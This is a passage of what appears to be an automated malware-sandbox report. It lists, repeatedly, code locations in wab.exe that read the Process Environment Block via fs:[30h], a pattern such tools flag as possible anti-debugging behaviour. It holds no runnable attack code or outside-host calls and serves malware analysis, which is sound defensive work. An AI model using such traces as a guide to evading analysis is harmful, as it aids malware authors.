Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h] 12_2_233001C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED02D mov eax, dword ptr fs:[00000030h] 12_2_232ED02D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F8009 mov eax, dword ptr fs:[00000030h] 12_2_232F8009
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23315004 mov eax, dword ptr fs:[00000030h] 12_2_23315004
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23315004 mov ecx, dword ptr fs:[00000030h] 12_2_23315004
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23399060 mov eax, dword ptr fs:[00000030h] 12_2_23399060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h] 12_2_232F6074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h] 12_2_232F6074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7072 mov eax, dword ptr fs:[00000030h] 12_2_232F7072
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C505B mov eax, dword ptr fs:[00000030h] 12_2_233C505B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320044 mov eax, dword ptr fs:[00000030h] 12_2_23320044
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h] 12_2_232F1051
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h] 12_2_232F1051
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C50B7 mov eax, dword ptr fs:[00000030h] 12_2_233C50B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AB0AF mov eax, dword ptr fs:[00000030h] 12_2_233AB0AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233300A5 mov eax, dword ptr fs:[00000030h] 12_2_233300A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA093 mov ecx, dword ptr fs:[00000030h] 12_2_232EA093
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC090 mov eax, dword ptr fs:[00000030h] 12_2_232EC090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332D0F0 mov eax, dword ptr fs:[00000030h] 12_2_2332D0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332D0F0 mov ecx, dword ptr fs:[00000030h] 12_2_2332D0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC0F6 mov eax, dword ptr fs:[00000030h] 12_2_232EC0F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330B0D0 mov eax, dword ptr fs:[00000030h] 12_2_2330B0D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23319723 mov eax, dword ptr fs:[00000030h] 12_2_23319723
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF717 mov eax, dword ptr fs:[00000030h] 12_2_233AF717
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FD700 mov ecx, dword ptr fs:[00000030h] 12_2_232FD700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B970B mov eax, dword ptr fs:[00000030h] 12_2_233B970B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B970B mov eax, dword ptr fs:[00000030h] 12_2_233B970B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F471B mov eax, dword ptr fs:[00000030h] 12_2_232F471B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F471B mov eax, dword ptr fs:[00000030h] 12_2_232F471B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320774 mov eax, dword ptr fs:[00000030h] 12_2_23320774
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23302760 mov ecx, dword ptr fs:[00000030h] 12_2_23302760
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h] 12_2_232F4779
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h] 12_2_232F4779
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov ecx, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339E750 mov eax, dword ptr fs:[00000030h] 12_2_2339E750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23323740 mov eax, dword ptr fs:[00000030h] 12_2_23323740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332174A mov eax, dword ptr fs:[00000030h] 12_2_2332174A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C17BC mov eax, dword ptr fs:[00000030h] 12_2_233C17BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F07A7 mov eax, dword ptr fs:[00000030h] 12_2_232F07A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321796 mov eax, dword ptr fs:[00000030h] 12_2_23321796
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321796 mov eax, dword ptr fs:[00000030h] 12_2_23321796
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h] 12_2_233CB781
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h] 12_2_233CB781
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E7E0 mov eax, dword ptr fs:[00000030h] 12_2_2331E7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h] 12_2_232F77F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h] 12_2_232F77F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF7CF mov eax, dword ptr fs:[00000030h] 12_2_233AF7CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320630 mov eax, dword ptr fs:[00000030h] 12_2_23320630
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov esi, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov eax, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov eax, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7623 mov eax, dword ptr fs:[00000030h] 12_2_232F7623
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h] 12_2_232F5622
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h] 12_2_232F5622
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov eax, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F0630 mov eax, dword ptr fs:[00000030h] 12_2_232F0630
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h] 12_2_2331D600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h] 12_2_2331D600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4600 mov eax, dword ptr fs:[00000030h] 12_2_233C4600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF607 mov eax, dword ptr fs:[00000030h] 12_2_233AF607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332360F mov eax, dword ptr fs:[00000030h] 12_2_2332360F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332670 mov eax, dword ptr fs:[00000030h] 12_2_23332670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332670 mov eax, dword ptr fs:[00000030h] 12_2_23332670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F0670 mov eax, dword ptr fs:[00000030h] 12_2_232F0670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov esi, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov eax, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov eax, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h] 12_2_232ED64A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h] 12_2_232ED64A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23325654 mov eax, dword ptr fs:[00000030h] 12_2_23325654
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov eax, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov ecx, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov eax, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3640 mov eax, dword ptr fs:[00000030h] 12_2_232F3640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h] 12_2_2332C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h] 12_2_2332C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F965A mov eax, dword ptr fs:[00000030h] 12_2_232F965A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F965A mov eax, dword ptr fs:[00000030h] 12_2_232F965A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h] 12_2_233B86A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h] 12_2_233B86A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C691 mov eax, dword ptr fs:[00000030h] 12_2_2337C691
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF68C mov eax, dword ptr fs:[00000030h] 12_2_233AF68C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F8690 mov eax, dword ptr fs:[00000030h] 12_2_232F8690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h] 12_2_2336C6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h] 12_2_2336C6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h] 12_2_232E96E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h] 12_2_232E96E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FC6E0 mov eax, dword ptr fs:[00000030h] 12_2_232FC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h] 12_2_233166E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h] 12_2_233166E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F06CF mov eax, dword ptr fs:[00000030h] 12_2_232F06CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D6D0 mov eax, dword ptr fs:[00000030h] 12_2_2331D6D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BA6C0 mov eax, dword ptr fs:[00000030h] 12_2_233BA6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233986C2 mov eax, dword ptr fs:[00000030h] 12_2_233986C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332539 mov eax, dword ptr fs:[00000030h] 12_2_23332539
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321527 mov eax, dword ptr fs:[00000030h] 12_2_23321527
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h] 12_2_232F3536
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h] 12_2_232F3536
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
